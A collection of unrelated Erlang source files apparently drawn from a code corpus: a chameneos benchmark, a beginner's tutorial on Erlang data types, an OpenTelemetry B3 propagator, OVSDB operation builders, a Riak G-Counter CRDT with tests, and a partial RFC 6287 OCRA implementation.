complement(yellow, red) -> blue.
show_complements() ->
[ io:fwrite("~p + ~p -> ~p~n", [A, B, complement(A, B)]) ||
A <- [blue, red, yellow],
B <- [blue, red, yellow]].
print_header(L) ->
io:fwrite("~n"),
foreach(fun(C) -> io:fwrite(" ~p", [C]) end, L),
io:fwrite("~n").
run(L, N) ->
print_header(L),
Broker = self(),
foreach(fun(Color) -> spawn(fun() -> chameneos(Broker, Color, 0, 0) end) end, L),
broker(N),
cleanup(length(L), 0).
chameneos(Broker, Color, Meetings, MetSelf) ->
Broker ! { self(), Color },
receive
{OPid, OColor} ->
chameneos(Broker, complement(Color, OColor), Meetings+1,
if OPid == self() -> MetSelf+1; true -> MetSelf end);
stop ->
io:fwrite("~w~s\n", [Meetings, spell(MetSelf)]),
Broker ! Meetings
end.
broker(0) -> nil;
broker(N) ->
receive
C1 = {Pid1, _} -> nil
end,
receive
C2 = {Pid2, _} ->
Pid1 ! C2,
Pid2 ! C1,
broker(N-1)
end.
cleanup(0, M) -> io:fwrite("~s~n", [spell(M)]);
cleanup(N, M) ->
receive
{Pid, _Color} ->
Pid ! stop,
cleanup(N, M);
Meetings ->
cleanup(N-1, M+Meetings)
end.
main([Arg]) ->
N = list_to_integer(Arg),
show_complements(),
run([blue, red, yellow], N),
run([blue, red, yellow, red, yellow, blue, red, yellow, red, blue], N),
io:fwrite("~n"),
halt(0). | examples/chameneosredux.erl | 0.542136 | 0.641935 | chameneosredux.erl | starcoder |
%%% # Numbers
%%% ## Variables
%%% Variables always start with an uppercase letter.
%%% Using an unbound variable will trigger an error on the CLI
One.
%%% A variable can only have a single value.
One = 1.
%%% For example, this works because 'One' already has a value of 1
Un = Uno = One = 1.
%%% Variables can be assigned using other varables.
Two = One + One.
Two = 2.
%%% This will fail because the statement is invalid, 'Two' cannot equal
%%% 'Two' plus one -- it's already been defined to equal two.
Two = Two + 1.
%%% The equals operator is not assigning values, instead it is performing
%%% pattern matching with the expression. This is why a variable can be
%%% 'rebound' to the same value: the pattern matches.
%%%
%%% In the terminal a variable can be cleared.
f(Two).
%%% Or with zero args, all variables can be cleared.
f().
%%% This cannot be done in an actual Erlang program, but is perfectly do-able
%%% in the CLI.
%%% In the erlang shell **expressions need to be terminated with a period.**
%%% Expressions can be separated with commas, but the last expression needs
%%% a period. Also, only the expression followed by a period will produce
%%% output
2 + 15.
49 * 100.
5 / 2.
5 div 2.
5 rem 2.
%%% Erlang handles ints and floating point numbers transparently when doing
%%% arithmatic. Use 'div' and 'rem' to perform integer-to-integer division.
%%%
%%% Arithmatic obeys order-of-operations rules.
(50 * 100) - 4999.
-(50 * 100 - 4999).
-50 * (100 - 4999).
%%% Integers can be expressed with other bases, just enter the number as
%%% ```base#value```. Base must be between 2 and 36
2#101010.
8#0677.
16#AE.
26#abcde.
%%% ## Atoms
%%% Atoms start with a lowercase letter. Atoms cannot be changed or broken
%%% apart.
atom.
cat_atom.
'this atom has spaces, but needs to be in single quotes'.
atom = 'atom'.
%%% Atoms always exist and are never garbage collected.
%%% This means that Atoms should **never** be created from user-input.
%%% ## Boolean Logic
true and false.
true or false.
true xor false.
true xor true.
not false.
not (true and true).
%%% Boolean operators 'and' and 'or' do not short-circut the way similar
%%% operators in java/C++ might. Use 'andalso' or 'orelse' to get the
%%% short-circuting behavior.
%%% Equality operators
5 =:= 5. % true
1 =:= 0. % false
1 =/= 0. % true
%%% Comparing nubers with decimals require some extra operators because
%%% floats are weird.
5 =:= 5.0. % false
5 == 5.0. % true
5 =/= 5.0. % true
5 /= 5.0. % false
%%% Comparisons are unsurprising.
1 < 2.
1 < 1.
1 >= 1.
1 =< 1.
%%% Erlang will throw a fit if you do naughty things with types.
%%% Here, try adding a number to an atom.
5 + llama.
%%% Comparisons are allowed between types, there is a strict ordering
%%% predefined:
%%% number < atom < reference < fun < port < pid < tuple < list < bit string
0 == false. % false, don't expect 'false' to equal 0 like in c
1 < false. % atoms are always greater than numbers
%%% ## Tuples
%%% Tuples can be defined with the curly bracket.
X = 10, Y = 4.
Point = {X, Y}.
%%% Extracting varues can be done with pattern matching.
{A, B} = Point.
A =:= X.
B =:= Y.
{_,C} = Point.
C =:= Y.
%%% A 'tagged tuple' is, by convention, a tuple containing a single atom
%%% followed by a single value.
PreciseTemp = {celsius, 18.342}.
{celsius, T} = PreciseTemp.
%%% Tagging the value can prevent misuse by accident.
{kelvin, 18.342} =:= PreciseTemp.
{kelvin, T} = PreciseTemp.
%%% ## Lists
%%% Lists are defined with square brackets and contain mixed data types
[1, 2, 3, {celsius, 123}, an_atom].
%%% Lists of just numbers might be surprising though.
[97, 98, 99]. % abc
%%% Erlang treats strings and list the same way. It kinda sucks tbh, but
%%% there are other ways to represent strings.
%%% Lists can be concatenated with the '++' operator
[1, 2, 3] ++ [4, 5].
%%% Items can be removed '--' operator.
[1, 2, 3, 3, 2] -- [2, 3].
%%% Chaining '--' on one line causes each to be evaluated right to left
[1, 2, 3] -- [2, 3] -- [3].
%%% The head and tail can be retrieved with built in functions (BIF)
hd([1, 2, 3]).
tl([1, 2, 3]).
%%% This can also be done with pattern matching
[Head|Tail] = [1, 2, 3].
Head =:= 1.
Tail =:= [2, 3].
[NewHead|NewTail] = Tail.
NewHead =:= 2.
NewTail =:= [3].
%%% Lists can be built with the pattern-matching syntax too.
TurboList = [5|Tail].
TurboList =:= [5, 2, 3].
%%% ## List Comprehensions
%%% A basic list comprehension is of the form '[Value || generator]'.
[2*N || N <- [1, 2, 3, 4]].
Menu = [{steak, 5.99}, {beer, 3.99}, {poutine, 3.50}, {kitten, 20.99}].
WithTax = [{Item, Price*1.07} || {Item, Price} <- Menu].
%%% Conditions can be added to restrict the generated values.
Filtered = [{Item, Price*1.07} || {Item, Price} <- Menu, Price > 4].
%%% Multiple generators and conditions can be used.
[{X+Y, X, Y} || X <- [1, 2], Y <- [2, 3]].
[{X+Y, X, Y} || X <- [1, 2, 3], Y <- [2, 3], X < 3].
[{X+Y, X, Y} || X <- [1, 2, 3], Y <- [2, 3], X < 3, X+Y > 3].
%%% Generators pattern-match and can also be used to filter.
Weather =
[{toronto, rain}
,{montreal, storms}
,{london, fog}
,{paris, sun}
,{boston, fog}
,{vancouver, snow}
].
FoggyPlaces = [X || {X, fog} <- Weather]. | src/starting_out.erl | 0.643329 | 0.868213 | starting_out.erl | starcoder |
%%%------------------------------------------------------------------------
%% Copyright 2019, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc An implementation of {@link otel_propagator_text_map} that injects and
%% extracts trace context using the B3 specification from Zipkin.
%%
%% Since `trace_context' and `baggage' are the two default propagators the
%% global TextMap Propagators must be configured if B3 is to be used for
%% propagation:
%%
%% ```
%% {text_map_propagators, [b3, baggage]},
%% '''
%%
%% To use B3 multi-header format use:
%%
%% ```
%% {text_map_propagators, [b3multi, baggage]},
%% '''
%%
%% ```
%% CompositePropagator = otel_propagator_text_map_composite:create([b3, baggage]),
%% opentelemetry:set_text_map_propagator(CompositePropagator).
%% '''
%%
%% It is also possible to set a separate list of injectors or extractors.
%% For example, if the service should extract B3 encoded context but you
%% only want to inject context encoded with the W3C TraceContext format
%% (maybe you have some services only supporting B3 that are making requests
%% to your server but you have no reason to continue propagating in both
%% formats when communicating to other services further down the stack).
%% In that case you would instead set configuration like:
%%
%%
%% ```
%% {text_map_extractors, [b3, trace_context, baggage]},
%% {text_map_injectors, [trace_context, baggage]},
%% '''
%%
%% Or using calls to {@link opentelemetry} at runtime:
%%
%% ```
%% B3CompositePropagator = otel_propagator_text_map_composite:create([b3, trace_context, baggage]),
%% CompositePropagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% opentelemetry:set_text_map_extractor(B3CompositePropagator),
%% opentelemetry:set_text_map_injector(CompositePropagator).
%% '''
%% @end
%%%-----------------------------------------------------------------------
-module(otel_propagator_b3).
-behaviour(otel_propagator_text_map).
-export([fields/1,
inject/4,
extract/5]).
-include("opentelemetry.hrl").
-define(B3_CONTEXT_KEY, <<"b3">>).
%% Returns all the keys the propagator sets with `inject'
fields(b3single) ->
otel_propagator_b3single:fields(b3single);
fields(b3multi) ->
otel_propagator_b3multi:fields(b3multi);
fields(_) ->
[].
-spec inject(Context, Carrier, CarrierSetFun, Options) -> Carrier
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierSetFun :: otel_propagator_text_map:carrier_set(),
Options :: b3multi | b3single.
inject(Ctx, Carrier, CarrierSet, Options=b3single) ->
otel_propagator_b3single:inject(Ctx, Carrier, CarrierSet, Options);
inject(Ctx, Carrier, CarrierSet, Options=b3multi) ->
otel_propagator_b3multi:inject(Ctx, Carrier, CarrierSet, Options);
inject(_Ctx, Carrier, _CarrierSet, _Options) ->
Carrier.
% Extract trace context from the supplied carrier. The b3 single header takes
% precedence over the multi-header format.
%
% If extraction fails, the original context will be returned.
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Options) -> Context
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
CarrierGetFun :: otel_propagator_text_map:carrier_get(),
Options :: otel_propagator_text_map:propagator_options().
extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) ->
case otel_propagator_b3single:extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) of
Result when Result =/= undefined -> Result;
_ ->
case otel_propagator_b3multi:extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) of
Result when Result =/= undefined -> Result;
_ -> Ctx
end
end. | apps/opentelemetry_api/src/otel_propagator_b3.erl | 0.796767 | 0.536556 | otel_propagator_b3.erl | starcoder |
%%-------------------------------------------------------------------
%% Copyright (c) 2020 <NAME> <EMAIL>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at:
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @author <NAME>
%% @doc OVSDB Database manipulation methods
%%
%% @end
%% Created : 16. Jun 2020 7:39 AM
%%-------------------------------------------------------------------
-module(ovsdb_ops).
-author("<NAME>").
-include("ovsdb_client.hrl").
%% API
-export([
insert/2, insert/3,
select/3,
update/3,
mutate/3,
delete/2,
wait/4, wait/5,
commit/1,
abort/0,
comment/1,
assert/1
]).
insert(Table, Row) ->
#{op => insert, table => Table, row => Row}.
insert(Table, Row, Id) ->
maps:merge(insert(Table, Row), #{<<"uuid-name">> => Id}).
select("*", Table, Conditions) ->
#{op => select, table => Table,
where => conditions(Conditions)};
select(Columns, Table, Conditions) ->
#{op => select, table => Table,
where => conditions(Conditions), columns => Columns}.
update(Table, Conditions, Row) ->
#{op => update, table => Table,
where => conditions(Conditions), row => Row}.
mutate(Table, Conditions, Mutations) ->
#{op => mutate, table => Table,
where => conditions(Conditions),
mutations => conditions(Mutations)}.
delete(Table, Conditions) ->
#{op => delete, table => Table, where => conditions(Conditions)}.
wait(Table, Conditions, Rows, Until) ->
wait(Table, Conditions, Rows, Until, []).
wait(Table, Conditions, Rows, Until, Columns) ->
#{op => wait, timeout => 10, table => Table,
where => conditions(Conditions),
columns => Columns, until => Until, rows => Rows}.
commit(Mode) ->
#{op => commit, durable => Mode}.
abort() ->
#{op => abort}.
comment(Comment) ->
#{op => comment, comment => Comment}.
assert(Lock) ->
#{op => assert, lock => Lock}.
%%%===================================================================
%%% Helpers
%%%===================================================================
conditions(Conditions) ->
lists:foldl(fun
({C, F, V}, Acc) ->
[[ovsdb_utils:to_binstring(C),
ovsdb_utils:to_binstring(F),
V] | Acc];
(#ovsdb_condition{column = C, function = F, value = V}, Acc) ->
[[ovsdb_utils:to_binstring(C),
ovsdb_utils:to_binstring(F),
V] | Acc]
end, [], Conditions). | src/ovsdb_ops.erl | 0.50952 | 0.404919 | ovsdb_ops.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% riak_dt_gcounter: A state based, grow only, convergent counter
%%
%% Copyright (c) 2007-2012 Basho Technologies, Inc. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%%% @doc
%%% a G-Counter CRDT, borrows liberally from argv0 and <NAME>'s vclock module
%%% @end
-module(riak_dt_gcounter).
-behaviour(riak_dt).
-export([new/0, value/1, update/3, merge/2, equal/2]).
-ifdef(EQC).
-include_lib("eqc/include/eqc.hrl").
-export([gen_op/0, update_expected/3, eqc_state_value/1]).
-endif.
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
%% EQC generator
-ifdef(EQC).
gen_op() ->
oneof([increment, {increment, gen_pos()}]).
gen_pos()->
?LET(X, int(), 1+abs(X)).
update_expected(_ID, increment, Prev) ->
Prev+1;
update_expected(_ID, {increment, By}, Prev) ->
Prev+By;
update_expected(_ID, _Op, Prev) ->
Prev.
eqc_state_value(S) ->
S.
-endif.
new() ->
[].
value(GCnt) ->
lists:sum([ Cnt || {_Act, Cnt} <- GCnt]).
update(increment, Actor, GCnt) ->
increment_by(1, Actor, GCnt);
update({increment, Amount}, Actor, GCnt) when is_integer(Amount), Amount > 0 ->
increment_by(Amount, Actor, GCnt).
merge(GCnt1, GCnt2) ->
merge(GCnt1, GCnt2, []).
merge([], [], Acc) ->
lists:reverse(Acc);
merge(LeftOver, [], Acc) ->
lists:reverse(Acc, LeftOver);
merge([], LeftOver, Acc) ->
lists:reverse(Acc, LeftOver);
merge([{Actor1, Cnt1}=AC1|Rest], Clock2, Acc) ->
case lists:keytake(Actor1, 1, Clock2) of
{value, {Actor1, Cnt2}, RestOfClock2} ->
merge(Rest, RestOfClock2, [{Actor1, max(Cnt1, Cnt2)}|Acc]);
false ->
merge(Rest, Clock2, [AC1|Acc])
end.
equal(VA,VB) ->
lists:sort(VA) =:= lists:sort(VB).
%% priv
increment_by(Amount, Actor, GCnt) when is_integer(Amount), Amount > 0 ->
{Ctr, NewGCnt} = case lists:keytake(Actor, 1, GCnt) of
false ->
{Amount, GCnt};
{value, {_N, C}, ModGCnt} ->
{C + Amount, ModGCnt}
end,
[{Actor, Ctr}|NewGCnt].
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
-ifdef(EQC).
eqc_value_test_() ->
{timeout, 120, [?_assert(crdt_statem_eqc:prop_converge(0, 1000, ?MODULE))]}.
-endif.
new_test() ->
?assertEqual([], new()).
value_test() ->
GC1 = [{1, 1}, {2, 13}, {3, 1}],
GC2 = [],
?assertEqual(15, value(GC1)),
?assertEqual(0, value(GC2)).
update_increment_test() ->
GC0 = new(),
GC1 = update(increment, 1, GC0),
GC2 = update(increment, 2, GC1),
GC3 = update(increment, 1, GC2),
?assertEqual([{1, 2}, {2, 1}], GC3).
update_increment_by_test() ->
GC0 = new(),
GC = update({increment, 7}, 1, GC0),
?assertEqual([{1, 7}], GC).
merge_test() ->
GC1 = [{<<"1">>, 1},
{<<"2">>, 2},
{<<"4">>, 4}],
GC2 = [{<<"3">>, 3},
{<<"4">>, 3}],
?assertEqual([], merge(new(), new())),
?assertEqual([{<<"1">>,1},{<<"2">>,2},{<<"3">>,3},{<<"4">>,4}],
lists:sort( merge(GC1, GC2))).
merge_less_left_test() ->
GC1 = [{<<"5">>, 5}],
GC2 = [{<<"6">>, 6}, {<<"7">>, 7}],
?assertEqual([{<<"5">>, 5},{<<"6">>,6}, {<<"7">>, 7}],
merge(GC1, GC2)).
merge_less_right_test() ->
GC1 = [{<<"6">>, 6}, {<<"7">>,7}],
GC2 = [{<<"5">>, 5}],
?assertEqual([{<<"5">>,5},{<<"6">>,6}, {<<"7">>, 7}],
lists:sort( merge(GC1, GC2)) ).
merge_same_id_test() ->
GC1 = [{<<"1">>, 2},{<<"2">>,4}],
GC2 = [{<<"1">>, 3},{<<"3">>,5}],
?assertEqual([{<<"1">>, 3},{<<"2">>,4},{<<"3">>,5}],
lists:sort( merge(GC1, GC2)) ).
equal_test() ->
GC1 = [{1, 2}, {2, 1}, {4, 1}],
GC2 = [{1, 1}, {2, 4}, {3, 1}],
GC3 = [{1, 2}, {2, 1}, {4, 1}],
GC4 = [{4, 1}, {1, 2}, {2, 1}],
?assertNot(equal(GC1, GC2)),
?assert(equal(GC1, GC3)),
?assert(equal(GC1, GC4)).
usage_test() ->
GC1 = new(),
GC2 = new(),
?assert(equal(GC1, GC2)),
GC1_1 = update({increment, 2}, a1, GC1),
GC2_1 = update(increment, a2, GC2),
GC3 = merge(GC1_1, GC2_1),
GC2_2 = update({increment, 3}, a3, GC2_1),
GC3_1 = update(increment, a4, GC3),
GC3_2 = update(increment, a1, GC3_1),
?assertEqual([{a1, 3}, {a2, 1}, {a3, 3}, {a4, 1}],
lists:sort(merge(GC3_2, GC2_2))).
-endif. | src/riak_dt_gcounter.erl | 0.520496 | 0.430626 | riak_dt_gcounter.erl | starcoder |
%%% @author <NAME> <<EMAIL>>
%%% @reference <a href="http://tools.ietf.org/html/rfc6287">RFC6287</a>
%%% @reference <a href="http://www.rfc-editor.org/errata_search.php?eid=3729">
%%% RFC Errata ID: 3729</a>
%%% @doc RFC6287 OCRA (OATH Challenge-Response Algorithm)
%%%
%%% given
%%% ```Suite = <<"OCRA-1:HOTP-SHA1-6:C-QN08-PSHA1">>.'''
%%%
%%% challenge `Q' for `Suite':
%%% ```{ok, Q} = rfc6287:challenge(Suite).'''
%%%
%%% generate `OCRA' for key `K', challenge `Q', counter `C=23' and
%%% Pin `<<"1234">>':
%%%
%%% ```
%%% Pin = <<"1234">>,
%%% K = <<"<KEY>">>,
%%% DI_client = #{suite => Suite, q => Q, c => 23, p => {pin, Pin}},
%%% {ok, OCRA} = rfc6287:generate(K, DI_client). '''
%%%
%%% verify `OCRA' for key `K', challenge `Q' and `PinHash' using
%%% `C=20' as staring counter and a counter_window of `10'
%%% ```
%%% PinHash = crypto:sha(Pin),
%%% DI_server = #{suite => Suite, q => Q, c => 20, p => PinHash},
%%% {ok, NextCounter} = rfc6287:verify(K, DI_server, OCRA, #{cw => 10}).
%%% '''
%%%
%%% `NextCounter' is `24'
%%%
-module(rfc6287).
-type suite() :: binary().
%% `OCRASuite' string
-type counter() :: 0..16#ffffffffffffffff.
%% DataInput parameter `C'
-type challenge() :: binary().
%% OCRA challenge string, output of {@link challenge/1.}
%% DataInput parameter `Q'
-type pin_hash() :: <<_:_*20>> | <<_:_*32>> | <<_:_*64>>.
%% DataInput parameter `P'
-type session_info() :: binary().
%% DataInput parameter `S'
-type timestep() :: <<_:_*8>>.
%% DataInput parameter `T'
-type ocra() :: binary().
%% OCRA result, output of {@link generate/2.}
-type key() :: <<_:_*20>> | <<_:_*32>> | <<_:_*40>> | <<_:_*64>> | <<_:_*128>>.
%% `K', either hexadecimal binary string or binary.
-type counter_window() :: pos_integer().
-type timestep_window() :: pos_integer().
-type data_input() :: #{suite := suite()
,c => counter()
,q := challenge()
,p => {pin, binary()} | pin_hash()
,s => session_info()
,t => timestep() | calc}.
-type dgst() :: sha | sha256 | sha512.
-type data_input_parsed() ::
[{c} |
{q, $A | $N | $H, 4..64} |
{p, dgst()} |
{s, 0..999} |
{t, pos_integer()}].
-export_type([suite/0, challenge/0, counter/0, pin_hash/0, ocra/0, key/0,
session_info/0, timestep/0, data_input/0]).
-export_type([timestep_window/0, counter_window/0]).
%% API exports
-export([challenge/1, generate/2, verify/4]).
%%====================================================================
%% API functions
%%====================================================================
%% @doc
%% Create random challenge() with format and length as specified in
%% `OCRASuite'.
%% @returns <dl>
%% <dt>`{ok, challenge()}'</dt>
%% <dt>`{error, invalid_suite}' if `OCRASuite'
%% is not a valid suite</dt>
%% </dl>
-spec challenge(OCRASuite :: suite()) ->
{ok, Q :: challenge()} | {error, invalid_suite}.
challenge(Suite) ->
Maybe = parse(Suite),
challenge1(Maybe).
challenge1(false) -> {error, invalid_suite};
challenge1({_, DIP}) ->
{_, F, XX} = lists:keyfind(q, 1, DIP),
Bin = crypto:strong_rand_bytes(XX),
{ok, challenge2(F, Bin)}.
challenge2($A, B) -> << <<(X rem 93 + $!)>> || <<X>> <= B >>;
challenge2($N, B) -> << <<(X rem 10 + $0)>> || <<X>> <= B >>;
challenge2($H, B) -> bin2hex(binary:part(B, 0, size(B) div 2)).
%% @doc
%% Generate `OCRA(K, {[C] | Q | [P | S | T]})'.
%% @returns <dl>
%% <dt>`{ok, ocra()}'</dt>
%% <dt>`{error, invalid_suite}' if suite in `DataInput' is
%% not a valid OCRA suite</dt>
%% <dt>`{error, invalid_key}' if `K' is not of the size
%% required by suite in `DataInput' or if `K' is twice the size
%% required by suite and but not a hex string.</dt>
%% <dt>`{error, invalid_data_input}' if DataInput is missing keys,
%% has to many keys or values not conforming to suite</dt>
%% </dl>
-spec generate(K :: key(), data_input()) ->
{ok, ocra()} |
{error,
invalid_suite | invalid_key | invalid_data_input}.
generate(K, #{suite := Suite} = DataInput) ->
Maybe = parse(Suite),
generate1(Maybe, {K, DataInput}).
generate1(false, _) -> {error, invalid_suite};
generate1({{Alg, _Truncation}, _DI} = Parsed, {K, DataInput}) ->
Maybe = fmt_key(dgst_sz(Alg), K),
generate2(Maybe, {Parsed, DataInput}).
generate2(false, _) -> {error, invalid_key};
generate2(Key, {{{Alg, Truncation}, DIP}, DataInput}) ->
Maybe = data(DIP, DataInput),
generate3(Maybe, {Key, Alg, Truncation}).
generate3(false, _) -> {error, invalid_data_input};
generate3(Data, {Key, Alg, Truncation}) ->
Bin = crypto:hmac(Alg, Key, Data),
{ok, truncate(Truncation, Bin)}.
%% @doc
%% Verify `OCRA' response.
%% @returns <dl>
%% <dt>`ok' - success</dt>
%% <dt>`{ok, NextCounter :: counter()}' - success, suite specified
%% a `C' parameter</dt>
%% <dt>`{error, failed}' - failure to verify `OCRA'</dt>
%% <dt>`{error, invalid_suite}' if suite in `DataInput' is
%% not a valid OCRA suite</dt>
%% <dt>`{error, invalid_key}' if `K' is not of the size
%% required by suite in `DataInput' or if `K' is twice the size
%% required by suite and but not a hex string.</dt>
%% <dt>`{error, invalid_data_input}' if DataInput is missing keys,
%% has to many keys or values not conforming to suite</dt>
%% <dt>`{error, invalid_parameters}' if `VerifyParams' is not
%% consistent (e.g. suite has `T' DataInput parameter, but
%% `VerifyParams' has no `tw' key)</dt>
%% </dl>
-spec verify(key(), data_input(), ocra(),
#{cw => counter_window() ,tw => timestep_window()}) ->
ok | {ok, New_Counter :: counter()} |
{error, failed} |
{error, invalid_suite | invalid_key | invalid_parameters}.
verify(K, #{suite := Suite} = DataInput, OCRA, VerifyParams) ->
Maybe = parse(Suite),
verify1(Maybe, {K, DataInput, OCRA, VerifyParams}).
verify1(false, _) -> {error, invalid_suite};
verify1({_, DIP} = Parsed, {K, DataInput, OCRA, VerifyParams}) ->
Maybe = vpar(DIP, VerifyParams),
verify2(Maybe, {Parsed, K, DataInput, OCRA}).
verify2(false, _) -> {error, invalid_parameters};
verify2(Vpar, {Parsed, K, DataInput, OCRA}) ->
{{Alg, _Truncation}, _DIP} = Parsed,
Maybe = fmt_key(dgst_sz(Alg), K),
verify3(Maybe, {Parsed, DataInput, OCRA, Vpar}).
verify3(false, _) -> {error, invalid_key};
verify3(K, {Parsed, DataInput, OCRA, Vpar}) ->
{{_Alg, _Truncation}, DIP} = Parsed,
Maybe = data(DIP, DataInput),
verify4(Maybe, {K, Parsed, DataInput, OCRA}, Vpar).
verify4(false, _, _) -> {error, invalid_data_input};
verify4(Data, {K, {_, DIP} = Parsed, #{t := calc} = DataInput0, OCRA}, Vpar) ->
{t, V} = lists:keyfind(t, 1, DIP),
DataInput = DataInput0#{t => fmt_ts(V)},
verify5(Data, {K, Parsed, DataInput, OCRA}, Vpar);
verify4(Data, Y, Vpar) -> verify5(Data, Y, Vpar).
verify5(Data, {K, {{Alg, Truncation}, _DIP}, _, OCRA}, []) ->
Bin0 = crypto:hmac(Alg, K, Data),
Bin = truncate(Truncation, Bin0),
verify_equal(Bin, OCRA);
verify5(Data, {K, Parsed, _, OCRA} = Y, [{cw, CW}]) ->
Maybe = ver_check({K, Parsed, Data, OCRA}),
ver_cw(Maybe, Y, CW);
verify5(Data, {K, Parsed, _, OCRA} = Y, [{tw, TW}]) ->
Maybe = ver_check({K, Parsed, Data, OCRA}),
ver_tw(Maybe, Y, TW, 1);
verify5(Data, {K, Parsed, _, OCRA} = Y, [{tw, TW}, {cw, CW}]) ->
Maybe = ver_check({K, Parsed, Data, OCRA}),
ver_tw_cw(ver_cw(Maybe, Y, CW), Y, CW, TW, 1).
%%====================================================================
%% Internal functions
%%====================================================================
ver_check({K, {{Alg, Truncation}, _}, Data, OCRA}) when is_binary(Data) ->
OCRA == truncate(Truncation, crypto:hmac(Alg, K, Data));
ver_check({K, {_, DIP} = Parsed, DataInput, OCRA}) ->
Data = data(DIP, DataInput),
ver_check({K, Parsed, Data, OCRA}).
ver_tw_cw({ok, NextC}, _, _, _, _) -> {ok, NextC};
ver_tw_cw({error, failed}, {K, Parsed, #{t := <<T:64>>} = DataInput, OCRA},
CW, TW, TS) when TS < TW ->
Past = {K, Parsed, DataInput#{t => <<(T - TS):64>>}, OCRA},
Future = {K, Parsed, DataInput#{t => <<(T + TS):64>>}, OCRA},
MaybeOk = ver_cw(ver_check(Past), Past, CW),
R = ver_tw_cw1(MaybeOk, Future, CW),
ver_tw_cw(R, {K, Parsed, DataInput, OCRA}, CW, TW, TS + 1);
ver_tw_cw(_, _, _, _, _) -> {error, failed}.
ver_tw_cw1({ok, C}, _, _) -> {ok, C};
ver_tw_cw1({error, failed}, Future, CW) ->
ver_cw(ver_check(Future), Future, CW).
ver_tw(true, _, _, _) -> ok;
ver_tw(false, {K, Parsed, #{t := <<T:64>>} = DataInput, OCRA}, TW, TS)
when TS < TW ->
Past = {K, Parsed, DataInput#{t => <<(T - TS):64>>}, OCRA},
Future = {K, Parsed, DataInput#{t => <<(T + TS):64>>}, OCRA},
Maybe = ver_check(Past) orelse ver_check(Future),
ver_tw(Maybe, {K, Parsed, DataInput, OCRA}, TW, TS + 1);
ver_tw(_, _, _, _) -> {error, failed}.
ver_cw(true, {_K, _Parsed, #{c := C}, _}, _) ->
{ok, (C + 1) band 16#ffffffffffffffff};
ver_cw(false, {K, Parsed, #{c := C} = DataInput, OCRA}, CW) when CW > 0 ->
Next = {K, Parsed, DataInput#{c => C + 1}, OCRA},
Maybe = ver_check(Next),
ver_cw(Maybe, Next, CW - 1);
ver_cw(_, _, _) -> {error, failed}.
verify_equal(A, A) -> ok;
verify_equal(_,_) -> {error, failed}.
-spec parse(suite()) ->
{{dgst(), Truncation :: false | 4..10},
data_input_parsed()} | false.
parse(Suite) when is_binary(Suite) ->
parse1(string:tokens(binary_to_list(Suite), ":"));
parse(_) -> false.
parse1(["OCRA-1", C, DI]) -> parse2(string:tokens(C, "-"), DI);
parse1(_) -> false.
parse2(["HOTP", A, T], DI) -> parse3(p_len(T, 0, 10), A, DI);
parse2(_,_) -> false.
parse3(0, A, DI) ->
parse4(p_di(string:tokens(DI, "-")), false, A);
parse3(X, A, DI) when X > 3 ->
parse4(p_di(string:tokens(DI, "-")), X, A);
parse3(_, _, _) -> false.
parse4(false, _, _) -> false;
parse4(DIP, Truncation, Alg) -> parse5(dgst(Alg), Truncation, DIP).
parse5(false, _, _) -> false;
parse5(Alg, Truncation, DIP) -> {{Alg, Truncation}, DIP}.
p_di(["C" | R]) -> p_di_q(R, [{c}]);
p_di(R) -> p_di_q(R, []).
p_di_q([[$Q, QT | [_, _] = QLen] | R], Acc)
when QT == $A; QT == $N; QT == $H ->
p_di_q1(p_len(QLen, 4, 64), QT, R, Acc);
p_di_q(_,_) -> false.
p_di_q1(false, _, _, _) -> false;
p_di_q1(QL, QT, R, Acc) -> p_di_p(R, [{q, QT, QL} | Acc]).
p_di_p([[$P | Alg] | R], Acc) -> p_di_p1(dgst(Alg), R, Acc);
p_di_p(R, Acc) -> p_di_s(R, Acc).
p_di_p1(false, _, _) -> false;
p_di_p1(Alg, R, Acc) -> p_di_s(R, [{p, Alg} | Acc]).
p_di_s([[$S | [_,_,_] = N] | R], Acc) -> p_di_s1(p_len(N, 0, 999), R, Acc);
p_di_s(R, Acc) -> p_di_ts(R, Acc).
p_di_s1(false, _, _) -> false;
p_di_s1(SLen, R, Acc) -> p_di_ts(R, [{s, SLen} | Acc]).
p_di_ts([], Acc) -> lists:reverse(Acc);
p_di_ts([[$T| G]], Acc) -> p_di_ts1(p_di_ts2(G), Acc);
p_di_ts(_, _) -> false.
p_di_ts1(false, _) -> false;
p_di_ts1(TS, Acc) -> lists:reverse([{t, TS}| Acc]).
p_di_ts2([]) -> 60;
p_di_ts2([X, $S]) -> p_len([X], 1, 59);
p_di_ts2([X1, X2, $S]) -> p_len([X1, X2], 1, 59);
